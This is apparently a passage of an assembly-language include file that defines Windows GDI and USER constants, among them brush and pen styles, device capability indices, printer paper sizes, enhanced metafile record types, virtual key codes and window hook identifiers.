PAN_MIDLINE_HIGH_POINTED equ 6
PAN_MIDLINE_HIGH_SERIFED equ 7
PAN_MIDLINE_CONSTANT_TRIMMED equ 8
PAN_MIDLINE_CONSTANT_POINTED equ 9
PAN_MIDLINE_CONSTANT_SERIFED equ 10
PAN_MIDLINE_LOW_TRIMMED equ 11
PAN_MIDLINE_LOW_POINTED equ 12
PAN_MIDLINE_LOW_SERIFED equ 13
PAN_XHEIGHT_CONSTANT_SMALL equ 2
PAN_XHEIGHT_CONSTANT_STD equ 3
PAN_XHEIGHT_CONSTANT_LARGE equ 4
PAN_XHEIGHT_DUCKING_SMALL equ 5
PAN_XHEIGHT_DUCKING_STD equ 6
PAN_XHEIGHT_DUCKING_LARGE equ 7
ELF_VENDOR_SIZE equ 4
ELF_VERSION equ 0
ELF_CULTURE_LATIN equ 0
RASTER_FONTTYPE equ 1h
DEVICE_FONTTYPE equ 2h
TRUETYPE_FONTTYPE equ 4h
PC_RESERVED equ 1h
PC_EXPLICIT equ 2h
PC_NOCOLLAPSE equ 4h
TRANSPARENT equ 1
OPAQUE equ 2
BKMODE_LAST equ 2
GM_COMPATIBLE equ 1
GM_ADVANCED equ 2
GM_LAST equ 2
PT_CLOSEFIGURE equ 1h
PT_LINETO equ 2h
PT_BEZIERTO equ 4h
PT_MOVETO equ 6h
MM_TEXT equ 1
MM_LOMETRIC equ 2
MM_HIMETRIC equ 3
MM_LOENGLISH equ 4
MM_HIENGLISH equ 5
MM_TWIPS equ 6
MM_ISOTROPIC equ 7
MM_ANISOTROPIC equ 8
MM_MIN equ MM_TEXT
MM_MAX equ MM_ANISOTROPIC
MM_MAX_FIXEDSCALE equ MM_TWIPS
_ABSOLUTE equ 1
RELATIVE equ 2
WHITE_BRUSH equ 0
LTGRAY_BRUSH equ 1
GRAY_BRUSH equ 2
DKGRAY_BRUSH equ 3
BLACK_BRUSH equ 4
NULL_BRUSH equ 5
HOLLOW_BRUSH equ NULL_BRUSH
WHITE_PEN equ 6
BLACK_PEN equ 7
NULL_PEN equ 8
OEM_FIXED_FONT equ 10
ANSI_FIXED_FONT equ 11
ANSI_VAR_FONT equ 12
SYSTEM_FONT equ 13
DEVICE_DEFAULT_FONT equ 14
DEFAULT_PALETTE equ 15
SYSTEM_FIXED_FONT equ 16
STOCK_LAST equ 16
CLR_INVALID equ 0FFFFFFFFh ; full 32-bit -1
BS_SOLID equ 0
BS_NULL equ 1
BS_HOLLOW equ BS_NULL
BS_HATCHED equ 2
BS_PATTERN equ 3
BS_INDEXED equ 4
BS_DIBPATTERN equ 5
BS_DIBPATTERNPT equ 6
BS_PATTERN8X8 equ 7
BS_DIBPATTERN8X8 equ 8
HS_HORIZONTAL equ 0
HS_VERTICAL equ 1
HS_FDIAGONAL equ 2
HS_BDIAGONAL equ 3
HS_CROSS equ 4
HS_DIAGCROSS equ 5
HS_FDIAGONAL1 equ 6
HS_BDIAGONAL1 equ 7
HS_SOLID equ 8
HS_DENSE1 equ 9
HS_DENSE2 equ 10
HS_DENSE3 equ 11
HS_DENSE4 equ 12
HS_DENSE5 equ 13
HS_DENSE6 equ 14
HS_DENSE7 equ 15
HS_DENSE8 equ 16
HS_NOSHADE equ 17
HS_HALFTONE equ 18
HS_SOLIDCLR equ 19
HS_DITHEREDCLR equ 20
HS_SOLIDTEXTCLR equ 21
HS_DITHEREDTEXTCLR equ 22
HS_SOLIDBKCLR equ 23
HS_DITHEREDBKCLR equ 24
HS_API_MAX equ 25
PS_SOLID equ 0
PS_DASH equ 1
PS_DOT equ 2
PS_DASHDOT equ 3
PS_DASHDOTDOT equ 4
PS_NULL equ 5
PS_INSIDEFRAME equ 6
PS_USERSTYLE equ 7
PS_ALTERNATE equ 8
PS_STYLE_MASK equ 0Fh
PS_ENDCAP_ROUND equ 0h
PS_ENDCAP_SQUARE equ 100h
PS_ENDCAP_FLAT equ 200h
PS_ENDCAP_MASK equ 0F00h
PS_JOIN_ROUND equ 0h
PS_JOIN_BEVEL equ 1000h
PS_JOIN_MITER equ 2000h
PS_JOIN_MASK equ 0F000h
PS_COSMETIC equ 0h
PS_GEOMETRIC equ 10000h
PS_TYPE_MASK equ 0F0000h
AD_COUNTERCLOCKWISE equ 1
AD_CLOCKWISE equ 2
PRF_CHECKVISIBLE equ 00000001h
PRF_NONCLIENT equ 00000002h
PRF_CLIENT equ 00000004h
PRF_ERASEBKGND equ 00000008h
PRF_CHILDREN equ 00000010h
PRF_OWNED equ 00000020h
BDR_RAISEDOUTER equ 0001h
BDR_SUNKENOUTER equ 0002h
BDR_RAISEDINNER equ 0004h
BDR_SUNKENINNER equ 0008h
BDR_OUTER equ 0003h
BDR_INNER equ 000Ch
BDR_RAISED equ 0005h
BDR_SUNKEN equ 000Ah
EDGE_RAISED equ BDR_RAISEDOUTER|BDR_RAISEDINNER
EDGE_SUNKEN equ BDR_SUNKENOUTER|BDR_SUNKENINNER
EDGE_ETCHED equ BDR_SUNKENOUTER|BDR_RAISEDINNER
EDGE_BUMP equ BDR_RAISEDOUTER|BDR_SUNKENINNER
BF_LEFT equ 0001h
BF_TOP equ 0002h
BF_RIGHT equ 0004h
BF_BOTTOM equ 0008h
BF_TOPLEFT equ BF_TOP|BF_LEFT
BF_TOPRIGHT equ BF_TOP|BF_RIGHT
BF_BOTTOMLEFT equ BF_BOTTOM|BF_LEFT
BF_BOTTOMRIGHT equ BF_BOTTOM|BF_RIGHT
BF_RECT equ BF_LEFT|BF_TOP|BF_RIGHT|BF_BOTTOM
BF_DIAGONAL equ 0010h
BF_DIAGONAL_ENDTOPRIGHT equ BF_DIAGONAL|BF_TOP|BF_RIGHT
BF_DIAGONAL_ENDTOPLEFT equ BF_DIAGONAL|BF_TOP|BF_LEFT
BF_DIAGONAL_ENDBOTTOMLEFT equ BF_DIAGONAL|BF_BOTTOM|BF_LEFT
BF_DIAGONAL_ENDBOTTOMRIGHT equ BF_DIAGONAL|BF_BOTTOM|BF_RIGHT
BF_MIDDLE equ 0800h
BF_SOFT equ 1000h
BF_ADJUST equ 2000h
BF_FLAT equ 4000h
BF_MONO equ 8000h
DRIVERVERSION equ 0
TECHNOLOGY equ 2
HORZSIZE equ 4
VERTSIZE equ 6
HORZRES equ 8
VERTRES equ 10
BITSPIXEL equ 12
PLANES equ 14
NUMBRUSHES equ 16
NUMPENS equ 18
NUMMARKERS equ 20
NUMFONTS equ 22
NUMCOLORS equ 24
PDEVICESIZE equ 26
CURVECAPS equ 28
LINECAPS equ 30
POLYGONALCAPS equ 32
TEXTCAPS equ 34
CLIPCAPS equ 36
RASTERCAPS equ 38
ASPECTX equ 40
ASPECTY equ 42
ASPECTXY equ 44
LOGPIXELSX equ 88
LOGPIXELSY equ 90
SIZEPALETTE equ 104
NUMRESERVED equ 106
COLORRES equ 108
PHYSICALWIDTH equ 110
PHYSICALHEIGHT equ 111
PHYSICALOFFSETX equ 112
PHYSICALOFFSETY equ 113
SCALINGFACTORX equ 114
SCALINGFACTORY equ 115
DT_PLOTTER equ 0
DT_RASDISPLAY equ 1
DT_RASPRINTER equ 2
DT_RASCAMERA equ 3
DT_CHARSTREAM equ 4
DT_METAFILE equ 5
DT_DISPFILE equ 6
CC_NONE equ 0
CC_CIRCLES equ 1
CC_PIE equ 2
CC_CHORD equ 4
CC_ELLIPSES equ 8
CC_WIDE equ 16
CC_STYLED equ 32
CC_WIDESTYLED equ 64
CC_INTERIORS equ 128
CC_ROUNDRECT equ 256
LC_NONE equ 0
LC_POLYLINE equ 2
LC_MARKER equ 4
LC_POLYMARKER equ 8
LC_WIDE equ 16
LC_STYLED equ 32
LC_WIDESTYLED equ 64
LC_INTERIORS equ 128
PC_NONE equ 0
PC_POLYGON equ 1
PC_RECTANGLE equ 2
PC_WINDPOLYGON equ 4
PC_TRAPEZOID equ 4
PC_SCANLINE equ 8
PC_WIDE equ 16
PC_STYLED equ 32
PC_WIDESTYLED equ 64
PC_INTERIORS equ 128
CP_NONE equ 0
CP_RECTANGLE equ 1
CP_REGION equ 2
TC_OP_CHARACTER equ 1h
TC_OP_STROKE equ 2h
TC_CP_STROKE equ 4h
TC_CR_90 equ 8h
TC_CR_ANY equ 10h
TC_SF_X_YINDEP equ 20h
TC_SA_DOUBLE equ 40h
TC_SA_INTEGER equ 80h
TC_SA_CONTIN equ 100h
TC_EA_DOUBLE equ 200h
TC_IA_ABLE equ 400h
TC_UA_ABLE equ 800h
TC_SO_ABLE equ 1000h
TC_RA_ABLE equ 2000h
TC_VA_ABLE equ 4000h
TC_RESERVED equ 8000h
TC_SCROLLBLT equ 10000h
RC_NONE equ 0
RC_BITBLT equ 1
RC_BANDING equ 2
RC_SCALING equ 4
RC_BITMAP64 equ 8
RC_GDI20_OUTPUT equ 10h
RC_GDI20_STATE equ 20h
RC_SAVEBITMAP equ 40h
RC_DI_BITMAP equ 80h
RC_PALETTE equ 100h
RC_DIBTODEV equ 200h
RC_BIGFONT equ 400h
RC_STRETCHBLT equ 800h
RC_FLOODFILL equ 1000h
RC_STRETCHDIB equ 2000h
RC_OP_DX_OUTPUT equ 4000h
RC_DEVBITS equ 8000h
DIB_RGB_COLORS equ 0
DIB_PAL_COLORS equ 1
DIB_PAL_INDICES equ 2
DIB_PAL_PHYSINDICES equ 2
DIB_PAL_LOGINDICES equ 4
SYSPAL_ERROR equ 0
SYSPAL_STATIC equ 1
SYSPAL_NOSTATIC equ 2
CBM_CREATEDIB equ 2h
CBM_INIT equ 4h
FLOODFILLBORDER equ 0
FLOODFILLSURFACE equ 1
CCHDEVICENAME equ 32
CCHFORMNAME equ 32
DM_SPECVERSION equ 320h
DM_ORIENTATION equ 1h
DM_PAPERSIZE equ 2h
DM_PAPERLENGTH equ 4h
DM_PAPERWIDTH equ 8h
DM_SCALE equ 10h
DM_COPIES equ 100h
DM_DEFAULTSOURCE equ 200h
DM_PRINTQUALITY equ 400h
DM_COLOR equ 800h
DM_DUPLEX equ 1000h
DM_YRESOLUTION equ 2000h
DM_TTOPTION equ 4000h
DM_COLLATE equ 8000h
DM_FORMNAME equ 10000h
DMORIENT_PORTRAIT equ 1
DMORIENT_LANDSCAPE equ 2
DMPAPER_LETTER equ 1
DMPAPER_FIRST equ DMPAPER_LETTER
DMPAPER_LETTERSMALL equ 2
DMPAPER_TABLOID equ 3
DMPAPER_LEDGER equ 4
DMPAPER_LEGAL equ 5
DMPAPER_STATEMENT equ 6
DMPAPER_EXECUTIVE equ 7
DMPAPER_A3 equ 8
DMPAPER_A4 equ 9
DMPAPER_A4SMALL equ 10
DMPAPER_A5 equ 11
DMPAPER_B4 equ 12
DMPAPER_B5 equ 13
DMPAPER_FOLIO equ 14
DMPAPER_QUARTO equ 15
DMPAPER_10X14 equ 16
DMPAPER_11X17 equ 17
DMPAPER_NOTE equ 18
DMPAPER_ENV_9 equ 19
DMPAPER_ENV_10 equ 20
DMPAPER_ENV_11 equ 21
DMPAPER_ENV_12 equ 22
DMPAPER_ENV_14 equ 23
DMPAPER_CSHEET equ 24
DMPAPER_DSHEET equ 25
DMPAPER_ESHEET equ 26
DMPAPER_ENV_DL equ 27
DMPAPER_ENV_C5 equ 28
DMPAPER_ENV_C3 equ 29
DMPAPER_ENV_C4 equ 30
DMPAPER_ENV_C6 equ 31
DMPAPER_ENV_C65 equ 32
DMPAPER_ENV_B4 equ 33
DMPAPER_ENV_B5 equ 34
DMPAPER_ENV_B6 equ 35
DMPAPER_ENV_ITALY equ 36
DMPAPER_ENV_MONARCH equ 37
DMPAPER_ENV_PERSONAL equ 38
DMPAPER_FANFOLD_US equ 39
DMPAPER_FANFOLD_STD_GERMAN equ 40
DMPAPER_FANFOLD_LGL_GERMAN equ 41
DMPAPER_LAST equ DMPAPER_FANFOLD_LGL_GERMAN
DMPAPER_USER equ 256
DMBIN_UPPER equ 1
DMBIN_FIRST equ DMBIN_UPPER
DMBIN_ONLYONE equ 1
DMBIN_LOWER equ 2
DMBIN_MIDDLE equ 3
DMBIN_MANUAL equ 4
DMBIN_ENVELOPE equ 5
DMBIN_ENVMANUAL equ 6
DMBIN_AUTO equ 7
DMBIN_TRACTOR equ 8
DMBIN_SMALLFMT equ 9
DMBIN_LARGEFMT equ 10
DMBIN_LARGECAPACITY equ 11
DMBIN_CASSETTE equ 14
DMBIN_LAST equ DMBIN_CASSETTE
DMBIN_USER equ 256
DMRES_DRAFT equ -1
DMRES_LOW equ -2
DMRES_MEDIUM equ -3
DMRES_HIGH equ -4
DMCOLOR_MONOCHROME equ 1
DMCOLOR_COLOR equ 2
DMDUP_SIMPLEX equ 1
DMDUP_VERTICAL equ 2
DMDUP_HORIZONTAL equ 3
DMTT_BITMAP equ 1
DMTT_DOWNLOAD equ 2
DMTT_SUBDEV equ 3
DMCOLLATE_FALSE equ 0
DMCOLLATE_TRUE equ 1
DM_GRAYSCALE equ 1h
DM_INTERLACED equ 2h
RDH_RECTANGLES equ 1
GGO_METRICS equ 0
GGO_BITMAP equ 1
GGO_NATIVE equ 2
TT_POLYGON_TYPE equ 24
TT_PRIM_LINE equ 1
TT_PRIM_QSPLINE equ 2
TT_AVAILABLE equ 1h
TT_ENABLED equ 2h
DM_UPDATE equ 1
DM_COPY equ 2
DM_PROMPT equ 4
DM_MODIFY equ 8
DM_IN_BUFFER equ DM_MODIFY
DM_IN_PROMPT equ DM_PROMPT
DM_OUT_BUFFER equ DM_COPY
DM_OUT_DEFAULT equ DM_UPDATE
DC_FIELDS equ 1
DC_PAPERS equ 2
DC_PAPERSIZE equ 3
DC_MINEXTENT equ 4
DC_MAXEXTENT equ 5
DC_BINS equ 6
DC_DUPLEX equ 7
DC_SIZE equ 8
DC_EXTRA equ 9
DC_VERSION equ 10
DC_DRIVER equ 11
DC_BINNAMES equ 12
DC_ENUMRESOLUTIONS equ 13
DC_FILEDEPENDENCIES equ 14
DC_TRUETYPE equ 15
DC_PAPERNAMES equ 16
DC_ORIENTATION equ 17
DC_COPIES equ 18
DCTT_BITMAP equ 1h
DCTT_DOWNLOAD equ 2h
DCTT_SUBDEV equ 4h
CA_NEGATIVE equ 1h
CA_LOG_FILTER equ 2h
ILLUMINANT_DEVICE_DEFAULT equ 0
ILLUMINANT_A equ 1
ILLUMINANT_B equ 2
ILLUMINANT_C equ 3
ILLUMINANT_D50 equ 4
ILLUMINANT_D55 equ 5
ILLUMINANT_D65 equ 6
ILLUMINANT_D75 equ 7
ILLUMINANT_F2 equ 8
ILLUMINANT_MAX_INDEX equ ILLUMINANT_F2
ILLUMINANT_TUNGSTEN equ ILLUMINANT_A
ILLUMINANT_DAYLIGHT equ ILLUMINANT_C
ILLUMINANT_FLUORESCENT equ ILLUMINANT_F2
ILLUMINANT_NTSC equ ILLUMINANT_C
RGB_GAMMA_MIN equ 2500
RGB_GAMMA_MAX equ 65000
REFERENCE_WHITE_MIN equ 6000
REFERENCE_WHITE_MAX equ 10000
REFERENCE_BLACK_MIN equ 0
REFERENCE_BLACK_MAX equ 4000
COLOR_ADJ_MIN equ -100
COLOR_ADJ_MAX equ 100
FONTMAPPER_MAX equ 10
ENHMETA_SIGNATURE equ 464D4520h
ENHMETA_STOCK_OBJECT equ 80000000h
EMR_HEADER equ 1
EMR_POLYBEZIER equ 2
EMR_POLYGON equ 3
EMR_POLYLINE equ 4
EMR_POLYBEZIERTO equ 5
EMR_POLYLINETO equ 6
EMR_POLYPOLYLINE equ 7
EMR_POLYPOLYGON equ 8
EMR_SETWINDOWEXTEX equ 9
EMR_SETWINDOWORGEX equ 10
EMR_SETVIEWPORTEXTEX equ 11
EMR_SETVIEWPORTORGEX equ 12
EMR_SETBRUSHORGEX equ 13
EMR_EOF equ 14
EMR_SETPIXELV equ 15
EMR_SETMAPPERFLAGS equ 16
EMR_SETMAPMODE equ 17
EMR_SETBKMODE equ 18
EMR_SETPOLYFILLMODE equ 19
EMR_SETROP2 equ 20
EMR_SETSTRETCHBLTMODE equ 21
EMR_SETTEXTALIGN equ 22
EMR_SETCOLORADJUSTMENT equ 23
EMR_SETTEXTCOLOR equ 24
EMR_SETBKCOLOR equ 25
EMR_OFFSETCLIPRGN equ 26
EMR_MOVETOEX equ 27
EMR_SETMETARGN equ 28
EMR_EXCLUDECLIPRECT equ 29
EMR_INTERSECTCLIPRECT equ 30
EMR_SCALEVIEWPORTEXTEX equ 31
EMR_SCALEWINDOWEXTEX equ 32
EMR_SAVEDC equ 33
EMR_RESTOREDC equ 34
EMR_SETWORLDTRANSFORM equ 35
EMR_MODIFYWORLDTRANSFORM equ 36
EMR_SELECTOBJECT equ 37
EMR_CREATEPEN equ 38
EMR_CREATEBRUSHINDIRECT equ 39
EMR_DELETEOBJECT equ 40
EMR_ANGLEARC equ 41
EMR_ELLIPSE equ 42
EMR_RECTANGLE equ 43
EMR_ROUNDRECT equ 44
EMR_ARC equ 45
EMR_CHORD equ 46
EMR_PIE equ 47
EMR_SELECTPALETTE equ 48
EMR_CREATEPALETTE equ 49
EMR_SETPALETTEENTRIES equ 50
EMR_RESIZEPALETTE equ 51
EMR_REALIZEPALETTE equ 52
EMR_EXTFLOODFILL equ 53
EMR_LINETO equ 54
EMR_ARCTO equ 55
EMR_POLYDRAW equ 56
EMR_SETARCDIRECTION equ 57
EMR_SETMITERLIMIT equ 58
EMR_BEGINPATH equ 59
EMR_ENDPATH equ 60
EMR_CLOSEFIGURE equ 61
EMR_FILLPATH equ 62
EMR_STROKEANDFILLPATH equ 63
EMR_STROKEPATH equ 64
EMR_FLATTENPATH equ 65
EMR_WIDENPATH equ 66
EMR_SELECTCLIPPATH equ 67
EMR_ABORTPATH equ 68
EMR_GDICOMMENT equ 70
EMR_FILLRGN equ 71
EMR_FRAMERGN equ 72
EMR_INVERTRGN equ 73
EMR_PAINTRGN equ 74
EMR_EXTSELECTCLIPRGN equ 75
EMR_BITBLT equ 76
EMR_STRETCHBLT equ 77
EMR_MASKBLT equ 78
EMR_PLGBLT equ 79
EMR_SETDIBITSTODEVICE equ 80
EMR_STRETCHDIBITS equ 81
EMR_EXTCREATEFONTINDIRECTW equ 82
EMR_EXTTEXTOUTA equ 83
EMR_EXTTEXTOUTW equ 84
EMR_POLYBEZIER16 equ 85
EMR_POLYGON16 equ 86
EMR_POLYLINE16 equ 87
EMR_POLYBEZIERTO16 equ 88
EMR_POLYLINETO16 equ 89
EMR_POLYPOLYLINE16 equ 90
EMR_POLYPOLYGON16 equ 91
EMR_POLYDRAW16 equ 92
EMR_CREATEMONOBRUSH equ 93
EMR_CREATEDIBPATTERNBRUSHPT equ 94
EMR_EXTCREATEPEN equ 95
EMR_POLYTEXTOUTA equ 96
EMR_POLYTEXTOUTW equ 97
EMR_MIN equ 1
EMR_MAX equ 97
STRETCH_ANDSCANS equ 1
STRETCH_ORSCANS equ 2
STRETCH_DELETESCANS equ 3
STRETCH_HALFTONE equ 4
TCI_SRCCHARSET equ 1
TCI_SRCCODEPAGE equ 2
TCI_SRCFONTSIG equ 3
MONO_FONT equ 8
JOHAB_CHARSET equ 130
HEBREW_CHARSET equ 177
ARABIC_CHARSET equ 178
GREEK_CHARSET equ 161
TURKISH_CHARSET equ 162
THAI_CHARSET equ 222
EASTEUROPE_CHARSET equ 238
RUSSIAN_CHARSET equ 204
MAC_CHARSET equ 77
BALTIC_CHARSET equ 186
FS_LATIN1 equ 1h
FS_LATIN2 equ 2h
FS_CYRILLIC equ 4h
FS_GREEK equ 8h
FS_TURKISH equ 10h
FS_HEBREW equ 20h
FS_ARABIC equ 40h
FS_BALTIC equ 80h
FS_THAI equ 10000h
FS_JISJAPAN equ 20000h
FS_CHINESESIMP equ 40000h
FS_WANSUNG equ 80000h
FS_CHINESETRAD equ 100000h
FS_JOHAB equ 200000h
FS_SYMBOL equ 80000000h
DEFAULT_GUI_FONT equ 17
DM_RESERVED1 equ 800000h
DM_RESERVED2 equ 1000000h
DM_ICMMETHOD equ 2000000h
DM_ICMINTENT equ 4000000h
DM_MEDIATYPE equ 8000000h
DM_DITHERTYPE equ 10000000h
DMPAPER_ISO_B4 equ 42
DMPAPER_JAPANESE_POSTCARD equ 43
DMPAPER_9X11 equ 44
DMPAPER_10X11 equ 45
DMPAPER_15X11 equ 46
DMPAPER_ENV_INVITE equ 47
DMPAPER_RESERVED_48 equ 48
DMPAPER_RESERVED_49 equ 49
DMPAPER_LETTER_EXTRA equ 50
DMPAPER_LEGAL_EXTRA equ 51
DMPAPER_TABLOID_EXTRA equ 52
DMPAPER_A4_EXTRA equ 53
DMPAPER_LETTER_TRANSVERSE equ 54
DMPAPER_A4_TRANSVERSE equ 55
DMPAPER_LETTER_EXTRA_TRANSVERSE equ 56
DMPAPER_A_PLUS equ 57
DMPAPER_B_PLUS equ 58
DMPAPER_LETTER_PLUS equ 59
DMPAPER_A4_PLUS equ 60
DMPAPER_A5_TRANSVERSE equ 61
DMPAPER_B5_TRANSVERSE equ 62
DMPAPER_A3_EXTRA equ 63
DMPAPER_A5_EXTRA equ 64
DMPAPER_B5_EXTRA equ 65
DMPAPER_A2 equ 66
DMPAPER_A3_TRANSVERSE equ 67
DMPAPER_A3_EXTRA_TRANSVERSE equ 68
DMTT_DOWNLOAD_OUTLINE equ 4
DMICMMETHOD_NONE equ 1
DMICMMETHOD_SYSTEM equ 2
DMICMMETHOD_DRIVER equ 3
DMICMMETHOD_DEVICE equ 4
DMICMMETHOD_USER equ 256
DMICM_SATURATE equ 1
DMICM_CONTRAST equ 2
DMICM_COLORMETRIC equ 3
DMICM_USER equ 256
DMMEDIA_STANDARD equ 1
DMMEDIA_GLOSSY equ 2
DMMEDIA_TRANSPARENCY equ 3
DMMEDIA_USER equ 256
DMDITHER_NONE equ 1
DMDITHER_COARSE equ 2
DMDITHER_FINE equ 3
DMDITHER_LINEART equ 4
DMDITHER_GRAYSCALE equ 5
DMDITHER_USER equ 256
GGO_GRAY2_BITMAP equ 4
GGO_GRAY4_BITMAP equ 5
GGO_GRAY8_BITMAP equ 6
GGO_GLYPH_INDEX equ 80h
GCP_DBCS equ 1h
GCP_REORDER equ 2h
GCP_USEKERNING equ 8h
GCP_GLYPHSHAPE equ 10h
GCP_LIGATE equ 20h
GCP_DIACRITIC equ 100h
GCP_KASHIDA equ 400h
GCP_ERROR equ 8000h
FLI_MASK equ 103Bh
GCP_JUSTIFY equ 10000h
GCP_NODIACRITICS equ 20000h
FLI_GLYPHS equ 40000h
GCP_CLASSIN equ 80000h
GCP_MAXEXTENT equ 100000h
GCP_JUSTIFYIN equ 200000h
GCP_DISPLAYZWG equ 400000h
GCP_SYMSWAPOFF equ 800000h
GCP_NUMERICOVERRIDE equ 1000000h
GCP_NEUTRALOVERRIDE equ 2000000h
GCP_NUMERICSLATIN equ 4000000h
GCP_NUMERICSLOCAL equ 8000000h
GCPCLASS_LATIN equ 1
GCPCLASS_HEBREW equ 2
GCPCLASS_ARABIC equ 2
GCPCLASS_NEUTRAL equ 3
GCPCLASS_LOCALNUMBER equ 4
GCPCLASS_LATINNUMBER equ 5
GCPCLASS_LATINNUMERICTERMINATOR equ 6
GCPCLASS_LATINNUMERICSEPARATOR equ 7
GCPCLASS_NUMERICSEPARATOR equ 8
GCPCLASS_PREBOUNDRTL equ 80h
GCPCLASS_PREBOUNDLTR equ 40h
DC_BINADJUST equ 19
DC_EMF_COMPLIANT equ 20
DC_DATATYPE_PRODUCED equ 21
DC_COLLATE equ 22
DCTT_DOWNLOAD_OUTLINE equ 8h
DCBA_FACEUPNONE equ 0h
DCBA_FACEUPCENTER equ 1h
DCBA_FACEUPLEFT equ 2h
DCBA_FACEUPRIGHT equ 3h
DCBA_FACEDOWNNONE equ 100h
DCBA_FACEDOWNCENTER equ 101h
DCBA_FACEDOWNLEFT equ 102h
DCBA_FACEDOWNRIGHT equ 103h
ICM_OFF equ 1
ICM_ON equ 2
ICM_QUERY equ 3
EMR_SETICMMODE equ 98
EMR_CREATECOLORSPACE equ 99
EMR_SETCOLORSPACE equ 100
EMR_DELETECOLORSPACE equ 101
SB_HORZ equ 0
SB_VERT equ 1
SB_CTL equ 2
SB_BOTH equ 3
SB_LINEUP equ 0
SB_LINELEFT equ 0
SB_LINEDOWN equ 1
SB_LINERIGHT equ 1
SB_PAGEUP equ 2
SB_PAGELEFT equ 2
SB_PAGEDOWN equ 3
SB_PAGERIGHT equ 3
SB_THUMBPOSITION equ 4
SB_THUMBTRACK equ 5
SB_TOP equ 6
SB_LEFT equ 6
SB_BOTTOM equ 7
SB_RIGHT equ 7
SB_ENDSCROLL equ 8
SBM_SETSCROLLINFO equ 00E9h
SBM_GETSCROLLINFO equ 00EAh
SIF_RANGE equ 0001h
SIF_PAGE equ 0002h
SIF_POS equ 0004h
SIF_DISABLENOSCROLL equ 0008h
SIF_TRACKPOS equ 0010h
SIF_ALL equ SIF_RANGE|SIF_PAGE|SIF_POS|SIF_TRACKPOS
SW_HIDE equ 0
SW_SHOWNORMAL equ 1
SW_NORMAL equ 1
SW_SHOWMINIMIZED equ 2
SW_SHOWMAXIMIZED equ 3
SW_MAXIMIZE equ 3
SW_SHOWNOACTIVATE equ 4
SW_SHOW equ 5
SW_MINIMIZE equ 6
SW_SHOWMINNOACTIVE equ 7
SW_SHOWNA equ 8
SW_RESTORE equ 9
SW_SHOWDEFAULT equ 10
SW_MAX equ 10
HIDE_WINDOW equ 0
SHOW_OPENWINDOW equ 1
SHOW_ICONWINDOW equ 2
SHOW_FULLSCREEN equ 3
SHOW_OPENNOACTIVATE equ 4
SW_PARENTCLOSING equ 1
SW_OTHERZOOM equ 2
SW_PARENTOPENING equ 3
SW_OTHERUNZOOM equ 4
KF_EXTENDED equ 100h
KF_DLGMODE equ 800h
KF_MENUMODE equ 1000h
KF_ALTDOWN equ 2000h
KF_REPEAT equ 4000h
KF_UP equ 8000h
VK_BACK equ 8h
VK_CANCEL equ 3h
VK_CAPITAL equ 14h
VK_CLEAR equ 0Ch
VK_CONTROL equ 11h
VK_DELETE equ 2Eh
VK_DOWN equ 28h
VK_END equ 23h
VK_ESCAPE equ 1Bh
VK_EXECUTE equ 2Bh
VK_HELP equ 2Fh
VK_HOME equ 24h
VK_INSERT equ 2Dh
VK_LBUTTON equ 1h
VK_LEFT equ 25h
VK_MBUTTON equ 4h
VK_MENU equ 12h
VK_NEXT equ 22h
VK_PAUSE equ 13h
VK_PGDN equ 22h
VK_PGUP equ 21h
VK_PRINT equ 2Ah
VK_PRIOR equ 21h
VK_RBUTTON equ 2h
VK_RETURN equ 0Dh
VK_RIGHT equ 27h
VK_SELECT equ 29h
VK_SHIFT equ 10h
VK_SNAPSHOT equ 2Ch
VK_SPACE equ 20h
VK_TAB equ 9h
VK_UP equ 26h
VK_NUMPAD0 equ 60h
VK_NUMPAD1 equ 61h
VK_NUMPAD2 equ 62h
VK_NUMPAD3 equ 63h
VK_NUMPAD4 equ 64h
VK_NUMPAD5 equ 65h
VK_NUMPAD6 equ 66h
VK_NUMPAD7 equ 67h
VK_NUMPAD8 equ 68h
VK_NUMPAD9 equ 69h
VK_MULTIPLY equ 6Ah
VK_ADD equ 6Bh
VK_SEPARATOR equ 6Ch
VK_SUBTRACT equ 6Dh
VK_DECIMAL equ 6Eh
VK_DIVIDE equ 6Fh
VK_F1 equ 70h
VK_F2 equ 71h
VK_F3 equ 72h
VK_F4 equ 73h
VK_F5 equ 74h
VK_F6 equ 75h
VK_F7 equ 76h
VK_F8 equ 77h
VK_F9 equ 78h
VK_F10 equ 79h
VK_F11 equ 7Ah
VK_F12 equ 7Bh
VK_F13 equ 7Ch
VK_F14 equ 7Dh
VK_F15 equ 7Eh
VK_F16 equ 7Fh
VK_F17 equ 80h
VK_F18 equ 81h
VK_F19 equ 82h
VK_F20 equ 83h
VK_F21 equ 84h
VK_F22 equ 85h
VK_F23 equ 86h
VK_F24 equ 87h
VK_NUMLOCK equ 90h
VK_SCROLL equ 91h
VK_LSHIFT equ 0A0h
VK_RSHIFT equ 0A1h
VK_LCONTROL equ 0A2h
VK_RCONTROL equ 0A3h
VK_LMENU equ 0A4h
VK_RMENU equ 0A5h
VK_ATTN equ 0F6h
VK_CRSEL equ 0F7h
VK_EXSEL equ 0F8h
VK_EREOF equ 0F9h
VK_PLAY equ 0FAh
VK_ZOOM equ 0FBh
VK_NONAME equ 0FCh
VK_PA1 equ 0FDh
VK_OEM_CLEAR equ 0FEh
WH_MIN equ -1
WH_MSGFILTER equ -1
WH_JOURNALRECORD equ 0
WH_JOURNALPLAYBACK equ 1
WH_KEYBOARD equ 2
WH_GETMESSAGE equ 3
WH_CALLWNDPROC equ 4
WH_CBT equ 5
WH_SYSMSGFILTER equ 6
WH_MOUSE equ 7
WH_HARDWARE equ 8
WH_DEBUG equ 9
WH_SHELL equ 10
WH_FOREGROUNDIDLE equ 11
WH_MAX equ 11
HC_ACTION equ 0
HC_GETNEXT equ 1
HC_SKIP equ 2
HC_NOREMOVE equ 3
HC_NOREM equ HC_NOREMOVE
HC_SYSMODALON equ 4
HC_SYSMODALOFF equ 5
HCBT_MOVESIZE equ 0
HCBT_MINMAX equ 1
HCBT_QS equ 2
HCBT_CREATEWND equ 3
HCBT_DESTROYWND equ 4
HCBT_ACTIVATE equ 5
HCBT_CLICKSKIPPED equ 6
HCBT_KEYSKIPPED equ 7
HCBT_SYSCOMMAND equ 8
HCBT_SETFOCUS equ 9
HSHELL_WINDOWCREATED equ 1
HSHELL_WINDOWDESTROYED equ 2
HSHELL_ACTIVATESHELLWINDOW equ 3
HKL_PREV equ 0
HKL_NEXT equ 1
KLF_ACTIVATE equ 1h
KLF_SUBSTITUTE_OK equ 2h
KLF_UNLOADPREVIOUS equ 4h
KLF_REORDER equ 8h
KL_NAMELENGTH equ 9
DESKTOP_READOBJECTS equ 1h
DESKTOP_CREATEWINDOW equ 2h
